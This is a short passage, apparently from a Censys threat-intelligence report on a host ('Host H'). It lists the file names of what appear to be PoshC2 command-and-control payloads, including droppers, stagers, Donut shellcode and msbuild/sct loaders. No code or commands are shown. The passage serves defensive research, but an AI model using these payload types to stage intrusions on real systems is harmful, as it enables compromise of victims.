[Posh_v4_msbuild.xml](Posh_v4_msbuild.xml) - [Posh_v4_x64.dll](Posh_v4_x64.dll) - [Posh_v4_x64_Shellcode.b64](Posh_v4_x64_Shellcode.b64) - [Posh_v4_x64_Shellcode.bin](Posh_v4_x64_Shellcode.bin) - [Posh_v4_x86.dll](Posh_v4_x86.dll) - 
[Posh_v4_x86_Shellcode.b64](Posh_v4_x86_Shellcode.b64) - [Posh_v4_x86_Shellcode.bin](Posh_v4_x86_Shellcode.bin) - [py_dropper.py](py_dropper.py) - [py_dropper.sh](py_dropper.sh) - [rg_sct.xml](rg_sct.xml) - [Sharp_Posh_PBind_Stager.cs](Sharp_Posh_PBind_Stager.cs) - [Sharp_Posh_Stager.cs](Sharp_Posh_Stager.cs) - [Sharp_v4_csc.cs](Sharp_v4_csc.cs) - [Sharp_v4_Donut_x64_Shellcode.b64](Sharp_v4_Donut_x64_Shellcode.b64) - [Sharp_v4_Donut_x64_Shellcode.bin](Sharp_v4_Donut_x64_Shellcode.bin) - [Sharp_v4_Donut_x86_Shellcode.b64](Sharp_v4_Donut_x86_Shellcode.b64) - [Sharp_v4_Donut_x86_Shellcode.bin](Sharp_v4_Donut_x86_Shellcode.bin) - [Sharp_v4_DotNet2JS.b64](Sharp_v4_DotNet2JS.b64) - [Sharp_v4_DotNet2JS.js](Sharp_v4_DotNet2JS.js) - [Sharp_v4_dropper_migrate_x64.c](Sharp_v4_dropper_migrate_x64.c) - [Sharp_v4_dropper_migrate_x64.exe](Sharp_v4_dropper_migrate_x64.exe) - [Sharp_v4_dropper_migrate_x86.c](Sharp_v4_dropper_migrate_x86.c) - [Sharp_v4_dropper_migrate_x86.exe](Sharp_v4_dropper_migrate_x86.exe) - [Sharp_v4_dropper_x64.c](Sharp_v4_dropper_x64.c) - [Sharp_v4_dropper_x64.exe](Sharp_v4_dropper_x64.exe) - [Sharp v4 dropper x86.c](Sharp v4 dropper x86.c) ----- #### Host H con’t ----- ###### CONTACT: federal@censys.io -----